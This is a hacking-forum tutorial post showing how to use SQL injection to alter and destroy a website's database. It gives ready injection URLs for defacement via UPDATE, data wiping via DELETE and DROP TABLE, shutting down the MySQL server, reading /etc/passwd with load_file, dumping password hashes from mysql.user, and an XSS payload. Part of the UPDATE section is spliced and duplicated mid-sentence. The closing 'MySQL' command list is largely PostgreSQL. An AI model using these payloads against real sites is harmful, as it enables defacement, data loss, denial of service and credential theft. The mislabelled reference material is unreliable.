Jump to content
sensi

[SQLi] Modifying site content

By sensi, in Tutoriale in engleza

Recommended Posts

sensi Newbie

sensi

Posted
Posted (edited)

MODIFYING SITE CONTENT:

---------------------------------------------------

Sometime, u find the vulnerable site and get evrything to know but maybe admin login doesn't exist or it is accessible for certain IP range. Even in that context, u can use some kewl SQL commands for modifying the site content. I haven't seen much articles addressing this one so thought to include it here.

Here, I will basically talk about few SQL commands u may use to change the site content. Therse commands are the workhorse of MySQL & are deadly when executed.

---->First let me list these commands:

UPDATE: It is used to edit infos already in the db without deleting any rows.

DELETE: It is used to delete the contents of one or more fields.

DROP: It is used completely delete a table & all its associated data.

Now, u could have figured out that these commands can be very desctructive if the site lets us to interact with db with no sanitization & proper permission.

---------------------------------------------------------------------------------------------------------------------------------------------

Command Usage:

**************

1).UPDATE:

Our vulnerable page is:

http://www.site.com/article.php?id=5

Lets say the query is:

SELECT title,data,author FROM article WHERE id=5

Though in reality, we don'By executing first query, we have set the title value as 'Hacked by x @ rstforums.com' in the table article while in second query, we have updated all three fields title, data, & author in the table article.

Sometimes, u may want to change the specific page with id=5. For this u will do:

http://www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*t

know the query as above, we can find the table and column name as discussed earlier.

So we would do:

http://www.site.com/article.php?id=5 UPDATE article SET title='Hacked by x @ rstforums.com'/*

or, u could alternatively do:

http://www.site.com/article.php?id=5 UPDATE article SET title='Hacked by x @ rstforums.com',data='Ur site has zero
security',author='Hacked by x @ rstforums.com'/*

By executing first query, we have set the title value as 'Hacked by x @ rstforums.com' in the table article while in second query, we have updated all three fields title, data, & author in the table article.

Sometimes, u may want to change the specific page with id=5. For this u will do:

http://www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*

---------------------------------------------------------------------------------------------------------------------------------

2).DELETE:

As already stated, this deletes the content of one or more fields permanently from the db server.

The syntax is:

http://www.site.com/article.php?id=5 DELETE title,data,author FROM article/*

or if u want to delete these fields from the id=5, u will do:

http://www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*

----------------------------------------------------------------------------------------------------------------------------------

3).DROP:

This is another deadly command u can use. With this, u can delete a table & all its associated data.

For this, we make our URL as:

http://www.site.com/article.php?id=5 DROP TABLE article/*

This would delete table article & all its contents.

----------------------------------------------------------------------------------------------------------------------------------------

4).SHUTTING DOWN MySQL SERVER:

This is like DoSing the server as it will make the MySQL resources unavailable for the legitimate users or site visitors... For this, you will be using: SHUTDOWN WITH NOWAIT;

So, you would craft a query which would execute the above command...

For example, in my case, I would do the following:

http://www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;

WOW! the MySQL server is down... This would prevent legitimate users & site visitors from using or viewing MySQL resources...

----------------------------------------------------------------------------------------------------------------------------------------------

5).LOADFILE:

MySQL has a function called load_file which you can use for your benefits again.. I have not seen much site where I could use this function... I think we should have MySQL root privilege for this.... Also, the magic quotes should be off for this.. But there is a way to get past the magic quotes... load_file can be used to load certain files of the server such as .htaccess, .htpasswd, etc.. & also password files like etc/passwd, etc..

Do something like below:

http://www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*

But sometimes, you will have to hex the part & do something like below:

http://www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)

where I have hexed... Now, if we are lucky, the scriptblock would echo the etc/passwd in the result..

-------------------------------------------------------------------------------------------------------------------------------

6).MySQL ROOT:

If the MySQL version is 5 or above, we might be able to gain MySQL root privilege which will again be helpful for us.. MySQL servers from version 5 have a table called mysql.user which contains the hashes & usernames for login... It is in the user table of the mysql database which ships with every installation of MySQL..

For this, you will do:

http://www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*

Now you will get the usernames & hashes.. The hash is mysqlsha1... Quick note: JTR won't crack it.. But InsidePro Password Recovery Software has one to do it..

---------------------------------------------------------------------------------------------------------------------------------

7).FINALIZING THE INJECTION TUTORIAL:

Also for all sql injectors, think in a broad way.. & hexing is an important part in sql injection.. Sometimes the things that can't be done with normal ways can be done by using the hex part.. & be sure to try things with char(), hex() functions.. With these, you can bypass magic quotes on the server.. Again, within the UNION statement, you may try to use the XSS which would be sometimes helpful for you..

http://www.site.com/article.php?id=5 UNION ALL SELECT <scblockedript>alert("XSS via SQL injection");</scblockedript>,2/*

Again in the above injection, you may require to hex up the javascriptblock part for bypassing the magic quotes..

Also for starters & those who know little things, you may setup a MySQL server & configure PHP for your apache server in your localhost where you can try different things..

In the command line interface of MySQL, try various commands enlisted below.. Try by modifying them... This would help you improve your MySQL command knowledge.. Also try to see how PHP codes interact with MySQL server.. For example, install some free forums like PHPBB, SMF,etc.. or some content management system as it would help you in two ways.. First, you would learn how the PHP interacts with MySQL.. You may check MySQL folder with what changes has occured after installing them.

--------------------------------------------------------------------------------------------------------------------------------------

8).MAJOR MySQL COMMANDS:

Below, I would list some major MySQL commands that might help you a lot... Play with them in different ways by setting up a MySQL server in your computer..

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database.

// Tutorial gasit intr-un txt vechi, modificat, restructurat.

Edited by sensi
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...